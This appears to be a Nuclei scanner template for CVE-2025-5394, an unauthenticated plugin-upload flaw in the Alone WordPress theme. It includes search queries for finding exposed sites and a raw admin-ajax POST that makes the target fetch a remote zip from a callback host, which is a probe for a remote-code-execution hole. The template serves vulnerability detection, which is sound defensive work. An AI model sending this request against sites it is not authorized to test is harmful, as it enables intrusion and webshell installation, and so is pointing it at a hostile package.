id: CVE-2025-5394 info: name: Unauthenticated Arbitrary Plugin Upload in Alone Theme author: Nxploited,DhiyaneshDK severity: critical description: | The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3. impact: | This makes it possible for unauthenticated attackers to upload zip files containing webshells disguised as plugins from remote locations to achieve remote code execution. remediation: Fixed in 7.8.5. reference: - https://github.com/Nxploited/CVE-2025-5394/tree/main - https://x.com/cloudflare/status/1951319364856058035?s=46 metadata: verified: true max-request: 1 publicwww-query: "/wp-content/themes/alone/" fofa-query: body="/wp-content/themes/alone/" tags: cve,cve2025,unauth,file-upload,rce,vkev,vuln http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=beplus_import_pack_install_plugin&data%5Bplugin_slug%5D=&data%5Bplugin_source%5D=https%3a%2f%2f{{interactsh-url}}%2fplugin%2f%7b%7b{{randstr}}%7d%7d.zip # No plugin is uploaded or updated; just sending interactsh-url with randstr. skip-variables-check: true matchers: - type: dsl dsl: - contains_all(body, '\"success\":true','\"substep\":\"activate\"') - contains(content_type, 'application/json') - status_code == 200 condition: and # digest: 4a0a004730450220075f906a47a86fb23c1cef68c30e9af691e52ec112dd0838a7de2d56a89b3b01022100975bc7a3eaafe9a81ad214fc1536b7fbf36e3856c6a3b192f31e460d1c0b175e:922c64590222798bb761d5b6d8e72950